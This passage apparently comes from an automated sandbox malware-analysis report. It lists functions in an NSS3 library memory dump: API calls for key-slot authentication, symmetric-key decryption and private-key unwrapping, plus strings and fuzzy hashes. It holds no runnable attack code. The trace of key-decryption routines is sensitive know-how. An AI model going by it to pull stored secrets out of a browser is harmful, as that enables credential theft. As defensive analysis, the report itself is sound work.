PK11_FreeSymKey.NSS3(?), ref: 6CB0E14F
PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6CB0E195
PR_GetCurrentThread.NSS3 ref: 6CB0E1FC

Part of subcall function 6CB02460: PR_SetError.NSS3(FFFFE005,00000000,6CBA7379,00000002,?), ref: 6CB02493

Strings

key, xrefs: 6CB0E046
application data, xrefs: 6CB0DFE0
handshake data, xrefs: 6CB0DFF7
early application data, xrefs: 6CB0DFC9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
String ID: application data$early application data$handshake data$key
API String ID: 1461918828-2699248424
Opcode ID: 168156a136ab9990c38e396712855efd3f163abc61dbc6d7c03b7fa6c3362932
Instruction ID: 21028ab4e14c31be5ed59078e568da5e1cdda52c0ed9cf6588f9ea38f3275ecb
Opcode Fuzzy Hash: 168156a136ab9990c38e396712855efd3f163abc61dbc6d7c03b7fa6c3362932
Instruction Fuzzy Hash: 9AC1F871B002959FDB04CF75DC80BAEBBB4FF48318F044129E9499BA91E731E954CBA2

Function 6CABA9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CABA9CA

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6CBD0B04,?), ref: 6CABA9F7

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CABAA0B
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CABAA33
PK11_GetInternalKeySlot.NSS3 ref: 6CABAA55
PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6CABAA69
PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6CABAAD4
PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6CABAB18
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CABAB5A
PK11_FreeSymKey.NSS3(00000000), ref: 6CABAB85
PK11_FreeSymKey.NSS3(00000000), ref: 6CABAB99
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CABABDC
PK11_FreeSymKey.NSS3(?), ref: 6CABABE9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CABABF7

Part of subcall function 6CABAC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CABAB3E,?,?,?), ref: 6CABAC35
Part of subcall function 6CABAC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CABAB3E,?,?,?), ref: 6CABAC55
Part of subcall function 6CABAC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CABAB3E,?,?), ref: 6CABAC70
Part of subcall function 6CABAC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CABAC92
Part of subcall function 6CABAC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CABAB3E), ref: 6CABACD7

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
String ID:
API String ID: 2602994911-0
Opcode ID: c50af6a7e407d2c9981b6f6b8b7636298180d2cf024f62596f3b5a73ad5817fd
Instruction ID: 8d943fa3f8c22f4da69adbdd1a33b7bdab3ee3d91e867a8978700cbc4e4cb82f
Opcode Fuzzy Hash: c50af6a7e407d2c9981b6f6b8b7636298180d2cf024f62596f3b5a73ad5817fd
Instruction Fuzzy Hash: D7710472A04305ABD701CF68DD41B5BB7AFAF84358F144A2DF964A7640FB31DD888792

Function 6C9FECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9FED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9FEE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9FEF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C9FEF98

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9FF483
%s at line %d of [%.10s], xrefs: 6C9FF492
database corruption, xrefs: 6C9FF48D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: e8cfdcdd7225185a2ca15ddaaf70c91f65d4a87fdb1607ebfdf29514d07bd205
Instruction ID: dbbf1cdfae478252695ae2e54b654cab178bc728fea416ef2d0e7ef7bfd4aa6c
Opcode Fuzzy Hash: e8cfdcdd7225185a2ca15ddaaf70c91f65d4a87fdb1607ebfdf29514d07bd205
Instruction Fuzzy Hash: AA62F034A042458FEB04CF68C484BAEBBF5BF4532CF184199D8656BB92D775E887CB90

Function 6CA9FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON

Download Yara Rule

APIs

PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CA9FD06

Part of subcall function 6CA9F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CA9F696
Part of subcall function 6CA9F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CA9F789
Part of subcall function 6CA9F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CA9F796
Part of subcall function 6CA9F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CA9F79F
Part of subcall function 6CA9F670: SECITEM_DupItem_Util.NSS3 ref: 6CA9F7F0

Part of subcall function 6CAC3440: PK11_GetAllTokens.NSS3 ref: 6CAC3481
Part of subcall function 6CAC3440: PR_SetError.NSS3(00000000,00000000), ref: 6CAC34A3
Part of subcall function 6CAC3440: TlsGetValue.KERNEL32 ref: 6CAC352E
Part of subcall function 6CAC3440: EnterCriticalSection.KERNEL32(?), ref: 6CAC3542
Part of subcall function 6CAC3440: PR_Unlock.NSS3(?), ref: 6CAC355B

SECITEM_DupItem_Util.NSS3(?), ref: 6CA9FDAD

Part of subcall function 6CACFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA79003,?), ref: 6CACFD91
Part of subcall function 6CACFD80: PORT_Alloc_Util.NSS3(A4686CAD,?), ref: 6CACFDA2
Part of subcall function 6CACFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAD,?,?), ref: 6CACFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6CA9FE00

Part of subcall function 6CACFD80: free.MOZGLUE(00000000,?,?), ref: 6CACFDD1

Part of subcall function 6CABE550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CABE5A0

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA9FEBB
PK11_FreeSymKey.NSS3(00000000), ref: 6CA9FEC8
PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CA9FED3
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA9FF0C
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA9FF23
PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CA9FF4D
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CA9FFDA
PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CAA0007
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CAA0029
PR_SetError.NSS3(FFFFE002,00000000), ref: 6CAA0044

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
String ID:
API String ID: 138705723-0
Opcode ID: 1f3ad691a61d2c90f54c4ef9422f426e238a8f7262853b3963ed983fe8fbcbdc
Instruction ID: 75167544d2fba13b71f7d950b1f001eab92eba8c845f2c45d3152e6cc611a781
Opcode Fuzzy Hash: 1f3ad691a61d2c90f54c4ef9422f426e238a8f7262853b3963ed983fe8fbcbdc
Instruction Fuzzy Hash: A8B1A6716043019FE704CF29CC81A6AB7E5FF88308F598A2DF95E97A41E770E984CB91

Function 6CA97D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?), ref: 6CA97DDC

Part of subcall function 6CAD07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA78298,?,?,?,6CA6FCE5,?), ref: 6CAD07BF
Part of subcall function 6CAD07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAD07E6
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD081B
Part of subcall function 6CAD07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD0825

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CA97DF3
PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CA97F07
PK11_GetPadMechanism.NSS3(00000000), ref: 6CA97F57
PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CA97F98
PK11_FreeSymKey.NSS3(?), ref: 6CA97FC9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA97FDE
PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CA98000

Part of subcall function 6CAB9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CA97F0C,?,00000000,00000000,00000000,?), ref: 6CAB943B
Part of subcall function 6CAB9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CAB946B
Part of subcall function 6CAB9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CAB9546

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA98110
PK11_FreeSymKey.NSS3(00000000), ref: 6CA9811D
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA9822D
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA9823C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
String ID:
API String ID: 1923011919-0
Opcode ID: 042510a46e65acfa76b9787d08632ab6bf4266a5da9c61724d5df29040ec13ae
Instruction ID: de45e4cccbbc3090e4a140a780c7eac3fa7eb5f58d99b9e3a4fcc597e4181d9b
Opcode Fuzzy Hash: 042510a46e65acfa76b9787d08632ab6bf4266a5da9c61724d5df29040ec13ae
Instruction Fuzzy Hash: 4CC17FB1D102599BEB21CF14CD41FEAB7B9AF05308F0481E6E91DA6641E7319EC9CFA1

Function 6CAA0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CAA0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAA0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CAA1006
PK11_FreeSymKey.NSS3(?), ref: 6CAA101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAA1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAA103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CAA1048
memcpy.VCRUNTIME140(?,?,?), ref: 6CAA108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAA10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CAA10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CAA112E

Part of subcall function 6CAA1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CAA08C4,?,?), ref: 6CAA15B8
Part of subcall function 6CAA1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CAA08C4,?,?), ref: 6CAA15C1
Part of subcall function 6CAA1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA162E
Part of subcall function 6CAA1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA1637

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: d88483a35f255e3be97a9825cc3e1bc85a4d559a60beda45599f9b58c817654e
Instruction ID: ee86ad5c33c470a91bc8ff5046a46f5834f0b7419e6cd20a0a8390db960765ba
Opcode Fuzzy Hash: d88483a35f255e3be97a9825cc3e1bc85a4d559a60beda45599f9b58c817654e
Instruction Fuzzy Hash: 5F71C1B5A00245DFDB00CFA5CD84A6AB7B5BF48318F18862DE61997711E731D98ACB81

Function 6CAC1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6CAC1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6CAC2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CAC228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CAC23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAC241C

Strings

manufacturer, xrefs: 6CAC2179
token, xrefs: 6CAC1F2C
model, xrefs: 6CAC23CB, 6CAC23EC
serial, xrefs: 6CAC22A2

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: d64cdbba891f6de4fd1a8e8cc8d04e3ab1fdac8a30cdf244dcb0aba674cdbfdb
Instruction ID: 7f0318252b5354cf4d890b6042f011709061e34a892eff87d667aafaa9d7b89b
Opcode Fuzzy Hash: d64cdbba891f6de4fd1a8e8cc8d04e3ab1fdac8a30cdf244dcb0aba674cdbfdb
Instruction Fuzzy Hash: C60211A2F0C7C86EF7318671C44C3D76AE09B45328F1C266EC6DE46683C7A859C99393

Function 6CAC6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA71C6F,00000000,00000004,?,?), ref: 6CAC6C3F

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA71C6F,00000000,00000004,?,?), ref: 6CAC6C60
PR_ExplodeTime.NSS3(00000000,6CA71C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA71C6F,00000000,00000004,?,?), ref: 6CAC6C94

Strings

gfff, xrefs: 6CAC6D9C
gfff, xrefs: 6CAC6D30
gfff, xrefs: 6CAC6CF5
gfff, xrefs: 6CAC6D66
gfff, xrefs: 6CAC6CFD

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: afe772f5af80fe26e360bde4ee1c6dfb9a769a79c19ce7e4803167e0d8d92808
Instruction ID: db76f97fdb1ceb5d445f134de693b82e6007a4eb146cee453c051473d401b3d7
Opcode Fuzzy Hash: afe772f5af80fe26e360bde4ee1c6dfb9a769a79c19ce7e4803167e0d8d92808
Instruction Fuzzy Hash: 82513B72B016494FC708CDADDC527EEB7DAABA4310F48C23AE442DB785D638E946C752

Function 6CB40F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CB41027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB410B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB41353

Strings

'%.*q', xrefs: 6CB41217, 6CB41292
$, xrefs: 6CB412A0
-- , xrefs: 6CB40FF5
zeroblob(%d), xrefs: 6CB41223
NULL, xrefs: 6CB4119E
%lld, xrefs: 6CB4114B
%02x, xrefs: 6CB412F6

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: acd91dd82fa19649039214b294d15f36c7d8f70ccd3775a9142fad88a6b93456
Instruction ID: fd959cb012bc9bc528f2ace79d45c2e1172f0530a3095f64425540e27311aa13
Opcode Fuzzy Hash: acd91dd82fa19649039214b294d15f36c7d8f70ccd3775a9142fad88a6b93456
Instruction Fuzzy Hash: B4E19B75A0C3809FD714CF18C480A6BBBF5EF86348F08892DE98587B59E771E859DB42

Function 6CB48FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB48FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB490DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB49118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB4915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB491C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB49209

Strings

3333, xrefs: 6CB4925E
UUUU, xrefs: 6CB49255

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 8127da2850751f40148396254b180c0fa549592bae4eb012c1489ad9627aecbb
Instruction ID: 190bb0e4ef614a01a85a94c403fe51655f17d7ea63533f15622ec059e97cc951
Opcode Fuzzy Hash: 8127da2850751f40148396254b180c0fa549592bae4eb012c1489ad9627aecbb
Instruction Fuzzy Hash: 2EA1A072E001559BDB08CB68CD91BAEB7B9FF48324F098129E915A7785E736AC01CB91

Function 6CA00FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C9FCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA5F9C9,?,6CA5F4DA,6CA5F9C9,?,?,6CA2369A), ref: 6C9FCA7A
Part of subcall function 6C9FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9FCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CA0103E
EnterCriticalSection.KERNEL32(?), ref: 6CA01139
LeaveCriticalSection.KERNEL32(?), ref: 6CA01190
sqlite3_free.NSS3(00000000), ref: 6CA01227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CA0126E
sqlite3_free.NSS3(?), ref: 6CA0127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CA01267
winAccess, xrefs: 6CA0129B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: 7d70aa4043114b2c8d2979a742edd77a6ea0bf9063e36377dfe4ef5b569c8309
Instruction ID: 6a8f3dbfb1a440c409758e03752070baabc94748382c228dfdc5ae870ece1d13
Opcode Fuzzy Hash: 7d70aa4043114b2c8d2979a742edd77a6ea0bf9063e36377dfe4ef5b569c8309
Instruction Fuzzy Hash: 9471FD31705241DBEB049F64FC95ABE3379EB8A35CF18423DEA1587981D730E985CB92

